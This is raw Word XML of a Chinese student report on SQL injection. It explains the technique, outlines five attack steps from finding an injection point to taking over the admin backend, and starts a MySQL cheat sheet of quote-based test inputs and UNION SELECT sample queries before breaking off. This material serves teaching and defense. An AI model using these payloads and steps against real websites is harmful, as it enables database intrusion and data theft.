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BCcOIqBgEA&#10;ABUCAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbJWRwU7DMAyG70i8Q5QratPtgBBqu8M6joDQeIAo&#10;cdtA40RxKNvbk3abBNNA4pjY3+/PSbna2YGNEMg4rPgiLzgDVE4b7Cr+un3I7jijKFHLwSFUfA/E&#10;V/X1VbndeyCWaKSK9zH6eyFI9WAl5c4DpkrrgpUxHUMnvFTvsgOxLIpboRxGwJjFKYPXZQOt/Bgi&#10;2+zS9cHkzUPH2frQOM2quLFTwFwQF5kAA50x0vvBKBnTdmJEfWaWHa3yRM491BtPN0mdX54wVX5K&#10;fR9w5J7ScwajgT3LEB+lTepCBxLafWKAMf87ZLK0lLm2NQryJlCTsBcYT1a/pcPSNU79N3wzU6ds&#10;MX9q/QVQSwECFAAUAAAACACHTuJAQnDiKgYBAAAVAgAAEwAAAAAAAAABACAAAAAHOAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAGAAAAAAAAAAAAEAAAANY1&#10;AABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAACwAAAAAAAAABACAAAAD6NQAAX3Jl&#10;bHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABAAAAAAAAAAAABAAAAAAAAAAZHJz&#10;L1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAEAAAAPQ2AABkcnMvX3JlbHMv&#10;UEsBAhQAFAAAAAgAh07iQFhgsxu0AAAAIgEAABkAAAAAAAAAAQAgAAAAHDcAAGRycy9fcmVscy9l&#10;Mm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJAinHECtkAAAAJAQAADwAAAAAAAAABACAAAAAi&#10;AAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQOObKOkdBAAAiwgAAA4AAAAAAAAAAQAg&#10;AAAAKAEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAoAAAAAAAAA&#10;AAAQAAAAcQUAAGRycy9tZWRpYS9QSwECFAAUAAAACACHTuJAaFEJpQowAABuMQAAFQAAAAAAAAAB&#10;ACAAAACZBQAAZHJzL21lZGlhL2ltYWdlMS5qcGVnUEsFBgAAAAAKAAoAUwIAAD45AAAAAA==&#10;">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:shape id="文本框 2" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:812372;top:247128;height:427897;width:2272477;" fillcolor="#FFFFFF" filled="t" stroked="f" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAq+++Cb0AAADc&#10;AAAADwAAAGRycy9kb3ducmV2LnhtbEWP3WrCQBSE7wu+w3IKvSm6a3+Mpq5CC0putT7AMXtMgtmz&#10;Ibvm5+3dgtDLYWa+Ydbbwdaio9ZXjjXMZwoEce5MxYWG0+9uugThA7LB2jFpGMnDdjN5WmNqXM8H&#10;6o6hEBHCPkUNZQhNKqXPS7LoZ64hjt7FtRZDlG0hTYt9hNtavim1kBYrjgslNvRTUn493qyGS9a/&#10;fq768z6cksPH4hur5OxGrV+e5+oLRKAh/Icf7cxoeFcJ/J2JR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774JvQAA&#10;ANw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/>
                            <w:b/>
                            <w:sz w:val="4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sz w:val="48"/>
                            <w:szCs w:val="28"/>
                          </w:rPr>
                          <w:t>五邑大学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sz w:val="48"/>
                            <w:szCs w:val="28"/>
                            <w:lang w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t>智能制造学部</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" alt="D:\学院管理工作\学院基本信息\新校徽.jpg" type="#_x0000_t75" style="position:absolute;left:-103497;top:34120;height:839337;width:968991;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJA7LK1y7sAAADb&#10;AAAADwAAAGRycy9kb3ducmV2LnhtbEVPTWvCQBC9C/6HZQQvpW60tUh0FVGkQnpp7KHHITsmwexs&#10;3F2N/nu3UPA2j/c5i9XNNOJKzteWFYxHCQjiwuqaSwU/h93rDIQPyBoby6TgTh5Wy35vgam2HX/T&#10;NQ+liCHsU1RQhdCmUvqiIoN+ZFviyB2tMxgidKXUDrsYbho5SZIPabDm2FBhS5uKilN+MQrOn9n7&#10;7/5r+kKd8/m6zjOTbTOlhoNxMgcR6Bae4n/3Xsf5b/D3Szx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K1y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w10:wrap type="through"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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C91532" w:rsidRDefault="00C91532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C91532" w:rsidRDefault="00C91532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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文新魏" w:eastAsia="华文新魏" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="words"/>
        </w:rPr>
        <w:t>数据安全相关技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文新魏" w:eastAsia="华文新魏" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156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题    目：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       SQL注入相关知识概述        </w:t>
      </w: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学    院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智能制造学部             </w:t>
      </w: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专    业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电子信息工程             </w:t>
      </w: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班    级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160809                  </w:t>
      </w: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学    号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311600</w:t>
      </w:r>
      <w:r w:rsidR="002A05A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4309</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w: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姓    名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</w:t>
      </w:r>
      <w:r w:rsidR="002A05A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>郭兆镒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="600" w:lineRule="exact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指导教师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      温强                  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRPr="002A05A2" w:rsidRDefault="00C91532" w:rsidP="002A05A2"/>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc12884_WPSOffice_Level1"/>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>注入相关知识概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRPr="002A05A2" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc12891_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注入原理：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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SQL（Structured Query Language），即结构化查询语句，是用于访问和处理数据库的标准的计算机语言。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而SQL注入（SQL Injection），就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。通俗的讲就是用户提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据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SQL注入：利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，这是SQL注入的标准释义。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随着B/S模式被广泛的应用，用这种模式编写应用程序的程序员也越来越多，但由于开发人员的水平和经验参差不齐，相当一部分的开发人员在编写代码的时候，没有对用户的输入数据或者是页面中所携带的信息（如Cookie）进行必要的合法性判断，导致了攻击者可以提交一段数据库查询代码，根据程序返回的结果，获得一些他想得到的数据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SQL注入利用的是正常的HTTP服务端口，表面上看来和正常的web访问没有区别，隐蔽性极强，不易被发现。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SQL注入攻击过程分为五个步骤：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3" w:name="_Toc9145_WPSOffice_Level1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第一步：判断Web环境是否可以SQL注入。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/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如果URL仅是对网页的访问，不存在SQL注入问题，如：http://www.../162414739931.shtml就是普通的网页访问。只有对数据库进行动态查询的业务才可能存在SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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4" w:name="_Toc27088_WPSOffice_Level1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第二步：寻找SQL注入点。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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完成上一步的片断后，就要寻找可利用的注入漏洞，通过输入一些特殊语句，可以根据浏览器返回信息，判断数据库类型，从而构建数据库查询语句找到注入点。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5" w:name="_Toc23020_WPSOffice_Level1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第三步：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猜解用户名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和密码。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/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数据库中存放的表名、字段名都是有规律可言的。通过构建特殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度，以及内容。这个猜测过程可以通过网上大量注入工具快速实现，并借助破解网站轻易破译用户密码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6" w:name="_Toc20387_WPSOffice_Level1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第四步：寻找WEB管理后台入口。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/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通常WEB后台管理的界面不面向普通用户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开放，要寻找到后台的登陆路径，可以利用扫描工具快速搜索到可能的登陆地址，依次进行尝试，就可以试出管理台的入口地址。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7" w:name="_Toc13515_WPSOffice_Level1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第五步：入侵和破坏。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/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成功登陆后台管理后，接下来就可以任意进行破坏行为，如篡改网页、上传木马、修改、泄漏用户信息等，并进一步入侵数据库服务器。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SQL注入攻击的特点：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变种极多，有经验的攻击者会手动调整攻击参数，致使攻击数据的变种是不可枚举的，这导致传统的特征匹配检测方法仅能识别相当少的攻击，难以防范。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攻击过程简单，目前互联网上流行众多的SQL注入攻击工具，攻击者借助这些工具可很快对目标WEB系统实施攻击和破坏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109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危害大，由于WEB编程语言自身的缺陷以及具有安全编程能力的开发人员少之又少，大多数WEB业务系统均具有被SQL注入攻击的可能。而攻击者一旦攻击成功，可以对控制整个WEB业务系统，对数据做任意的修改，破坏力达到及至。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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该文章就是概述陈列一些SQL注入的相关知识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109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其中，SQL注入的相关知识点有以下的内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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spacing w:line="360" w:lineRule="auto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bookmarkStart w:id="8" w:name="_Toc10523_WPSOffice_Level1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MySQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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9" w:name="_Toc15560_WPSOffice_Level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．默认数据库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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其中的信息如下</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="41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030"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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需要根特权</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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信息图式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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可从版本5及更高版本获得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10" w:name="_Toc23577_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二．测试注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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False表示查询无效(MySQL错误/网站上缺少内容)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True表示查询有效(内容按照常规显示)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11" w:name="_Toc12891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字符串</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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给定查询 SELECT * FROM Table WHERE id = '1';</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="12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870"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532"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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>'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假</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>''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真</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>"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假</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>""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真</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>\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假</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>\\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lang w:bidi="ar"/>
              </w:rPr>
              <w:t>真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 w:val="24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 w:val="24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 w:val="24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 w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT * FROM Articles WHERE id = '1''';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 w:val="24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 w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT 1 FROM dual WHERE 1 = '1'''''''''''''UNION SELECT '2';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs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你可以使用尽可能多的撇号和引号，只要它们成对就行。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还可以在引号</w:t>
      </w:r>
